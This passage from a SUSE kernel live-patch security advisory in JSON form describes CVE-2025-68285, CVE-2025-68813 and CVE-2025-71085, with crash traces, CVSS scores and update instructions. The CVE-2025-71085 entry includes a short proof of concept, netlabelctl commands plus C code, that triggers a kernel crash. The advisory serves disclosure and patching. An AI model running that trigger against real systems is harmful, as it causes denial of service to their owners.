ceph_get_tree+0xff/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n 
entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n Freed by task 9475:\n kfree+0x212/0x290\n handle_one_map+0x23c/0x3b0\n ceph_osdc_handle_map+0x3c9/0x590\n mon_dispatch+0x655/0x6f0\n ceph_con_process_message+0xc3/0xe0\n ceph_con_v1_try_read+0x614/0x760\n ceph_con_workfn+0x2de/0x650\n process_one_work+0x486/0x7c0\n process_scheduled_works+0x73/0x90\n worker_thread+0x1c8/0x2a0\n kthread+0x2ec/0x300\n ret_from_fork+0x24/0x40\n ret_from_fork_asm+0x1a/0x30\n\nRewrite the wait loop to check the above condition directly with\nclient-\u003emonc.mutex and client-\u003eosdc.lock taken as appropriate. While\nat it, improve the timeout handling (previously mount_timeout could be\nexceeded in case wait_event_interruptible_timeout() slept more than\nonce) and access client-\u003eauth_err under client-\u003emonc.mutex to match\nhow it\u0027s set in finish_auth().\n\nmonmap_show() and osdmap_show() now take the respective lock before\naccessing the map as well.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68285",
"url": "https://www.suse.com/security/cve/CVE-2025-68285"
},
{
"category": "external",
"summary": "SUSE Bug 1255401 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255401"
},
{
"category": "external",
"summary": "SUSE Bug 1255402 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255402"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:04:11Z",
"details": "important"
}
],
"title": "CVE-2025-68285"
},
{
"cve": "CVE-2025-68813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvs: fix ipv4 null-ptr-deref in route error path\n\nThe IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()\nwithout ensuring skb-\u003edev is set, leading to a NULL pointer dereference\nin fib_compute_spec_dst() when ipv4_link_failure() attempts to send\nICMP destination unreachable messages.\n\nThe issue emerged after commit ed0de45a1008 (\"ipv4: recompile ip options\nin ipv4_link_failure\") started calling __ip_options_compile() from\nipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()\nwhich dereferences skb-\u003edev. An attempt was made to fix the NULL skb-\u003edev\ndereference in commit 0113d9c9d1cc (\"ipv4: fix null-deref in\nipv4_link_failure\"), but it only addressed the immediate dev_net(skb-\u003edev)\ndereference by using a fallback device. The fix was incomplete because\nfib_compute_spec_dst() later in the call chain still accesses skb-\u003edev\ndirectly, which remains NULL when IPVS calls dst_link_failure().\n\nThe crash occurs when:\n1. IPVS processes a packet in NAT mode with a misconfigured destination\n2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route\n3. The error path calls dst_link_failure(skb) with skb-\u003edev == NULL\n4. ipv4_link_failure() -\u003e ipv4_send_dest_unreach() -\u003e\n __ip_options_compile() -\u003e fib_compute_spec_dst()\n5. 
fib_compute_spec_dst() dereferences NULL skb-\u003edev\n\nApply the same fix used for IPv6 in commit 326bf17ea5d4 (\"ipvs: fix\nipv6 route unreach panic\"): set skb-\u003edev from skb_dst(skb)-\u003edev before\ncalling dst_link_failure().\n\nKASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]\nCPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2\nRIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233\nRIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285\nCall Trace:\n \u003cTASK\u003e\n spec_dst_fill net/ipv4/ip_options.c:232\n spec_dst_fill net/ipv4/ip_options.c:229\n __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330\n ipv4_send_dest_unreach net/ipv4/route.c:1252\n ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265\n dst_link_failure include/net/dst.h:437\n __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412\n ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68813",
"url": "https://www.suse.com/security/cve/CVE-2025-68813"
},
{
"category": "external",
"summary": "SUSE Bug 1256641 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "external",
"summary": "SUSE Bug 1256644 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256644"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:04:11Z",
"details": "important"
}
],
"title": "CVE-2025-68813"
},
{
"cve": "CVE-2025-71085",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71085"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = 
cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71085",
"url": "https://www.suse.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "SUSE Bug 1256623 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "external",
"summary": "SUSE Bug 1256624 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:04:11Z",
"details": "important"
}
],
"title": "CVE-2025-71085"
}
]
}